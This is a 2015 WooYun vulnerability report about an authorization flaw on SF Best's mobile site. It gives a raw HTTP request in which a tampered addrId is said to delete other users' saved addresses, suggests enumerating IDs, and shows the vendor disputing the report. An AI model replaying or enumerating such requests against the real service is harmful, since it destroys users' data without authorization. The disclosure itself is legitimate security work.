当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116335

漏洞标题:顺丰优选权限控制不严越权删除其他用户信息

相关厂商:顺丰优选

漏洞作者: 路人甲

提交时间:2015-05-26 19:00

修复时间:2015-05-27 10:13

公开时间:2015-05-27 10:13

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

手机站在修改用户地址的时候可以越权,遍历addrId可以越权修改,修改完后,对方收货地址中会被删除,地址ID变成自己的。
根据ID判断涉及300多万
这是A用户的地址

顺丰1.png


http://m.sfbest.com/user/address/list/1
POST /user/address/add HTTP/1.1
Host: m.sfbest.com
Proxy-Connection: keep-alive
Content-Length: 189
Accept: */*
Origin: http://m.sfbest.com
X-Requested-With: XMLHttpRequest
User-Agent:  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.sfbest.com/user/address/list/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:  
addrId=3033342&receiverName=%E5%9C%A8&mobile=13500000001&province=2&city=52&district=500&area=0&pcdaAddress=%E5%8C%97%E4%BA%AC%E5%8C%97%E4%BA%AC%E4%B8%9C%E5%9F%8E%E5%8C%BA&address=%E5%A4%A7


顺丰2.png

漏洞证明:

修改后addrId=3033342 地址变成B用户的了,A用户地址已被删除。

顺丰3.png


注:地址内容是自己填的,获取不了对方的,只是可以删 除所有用户地址。

修复方案:

权限控制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-27 10:13

厂商回复:

1)经过我们反复确认漏洞属于虚假漏洞。请注意看洞主所提交的截图中的地址从头到尾都在用一个地址也就是这个地址在做测试,只是变了一个手机号,也就是说洞主只是在自己的账户修改了手机号而已。
2)我们经过编辑功能,删除功能用自己账号替换别人账号的addrid之后,此问题依然不存在。
3)越权的定义必须先搞清楚。只有登陆A用户然后通过A用户的操作修改(删除)其它用户(B用户)信息的才算越权。根据洞主描述,其结果为登陆A用户最终没对B用户造成影响,只是会变更A用户自己的信息(这相当于用户正常编辑)。况且请洞主做完操作之后再刷新一下浏览器看一下,只要你动了addid这个参数不管你修改自己的还是别人的其实都是不成功的。
ps:感谢对顺丰优选的关注,如果还有其它的问题请于我们联系,我们会认真对待,每一位白帽子提出的安全问题,并且确认之后发放礼物以表感谢。感谢wooyun,感谢白帽子!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-05-27 11:04 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    我刚测试了一下,该漏洞是存在的。你这样测试:用帐号A修改的时候,把ID改成另外一个其他用户B的ID,然后去重新登录用户B的帐号,看一下地址是不是不存在了。

  2. 2015-05-27 11:15 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    请注意看洞主所提交的截图中的地址从头到尾都在用一个地址也就是这个地址在做测试,是同一个ID,但是这个ID的拥有者变了。

  3. 2015-05-27 14:50 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    @专业种田 已经测试多遍,问题不存在。2119391。这是我的一个地址id。麻烦您测试下,看能都否删掉!

  4. 2015-05-27 14:52 | 顺丰优选(乌云厂商)

    @专业种田 @hkAssassin 已经测试多遍,问题不存在。2119391。这是我的一个地址id。麻烦您测试下,看能都否删掉!

  5. 2015-05-27 15:05 | 顺丰优选(乌云厂商)

    @专业种田 我们再次确认了这个问题,真的不存在。不知道您是怎么测试的。可否私信个联系方式或者加我的联系方式 1416618367.咱们探讨一下。如果问题真的存在我们会对洞主和您发放礼物表示感谢!

  6. 2015-05-27 16:01 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    后面测试是不行了。前面测试是可以,截图是不同的浏览器,帐号不同。

  7. 2015-05-27 16:02 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    漏洞不存在就行了吧。